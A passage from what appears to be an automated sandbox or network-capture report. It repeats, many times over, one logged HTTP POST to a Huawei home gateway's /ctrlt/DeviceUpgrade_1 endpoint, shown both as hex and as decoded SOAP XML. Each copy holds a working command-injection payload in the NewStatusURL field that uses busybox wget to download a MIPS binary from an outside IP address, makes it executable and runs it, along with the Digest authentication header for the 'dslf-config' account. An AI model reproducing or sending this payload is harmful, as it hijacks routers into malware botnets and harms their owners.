6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 